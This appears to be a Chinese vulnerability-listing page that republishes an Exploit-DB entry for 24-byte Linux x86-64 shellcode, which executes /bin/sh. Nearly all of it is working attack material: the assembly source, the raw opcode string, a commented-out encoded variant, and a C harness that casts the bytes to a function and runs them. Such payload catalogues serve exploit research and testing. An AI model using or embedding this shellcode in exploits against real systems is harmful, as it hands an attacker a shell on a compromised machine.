漏洞概要

漏洞标题:
Linux/x86-64 – Execute /bin/sh Shellcode (24 bytes)

提交时间:
2018-01-13

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 41 人关注

漏洞详情

EDB-ID: 43550 Author: 0x4ndr3 Published: 2018-01-13
CVE: N/A Type: Shellcode Platform: Linux_x86-64
Aliases:
N/A
Advisory/Source: Link Tags:
N/A

E-DB Verified:
<a href="javascript:void(0);" data-trigger="focus" data-toggle="popover" data-placement="top" data-content='We make an effort to verify exploits (verifty) in our labs, when possible. A “non verified” exploit (marked by a clock icon clock) simply means we did not have the opportunity to test the exploit internally.’>
Waiting verification

Shellcode:

Download Shellcode Code Download

/

View Raw

Shellcode Size: 24 bytes
/*
global _start
section .text
_start:
	push 59
	pop rax
	cdq
	push rdx
	mov rbx,0x68732f6e69622f2f
	push rbx
	push rsp
	pop rdi
	push rdx
	push rdi
	push rsp
	pop rsi
	syscall
*/

#include <stdio.h>
#include <string.h>
char code[] = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05";
// char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
int main()
{
    printf("len:%d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}

发表评论

电子邮件地址不会被公开。 必填项已用*标注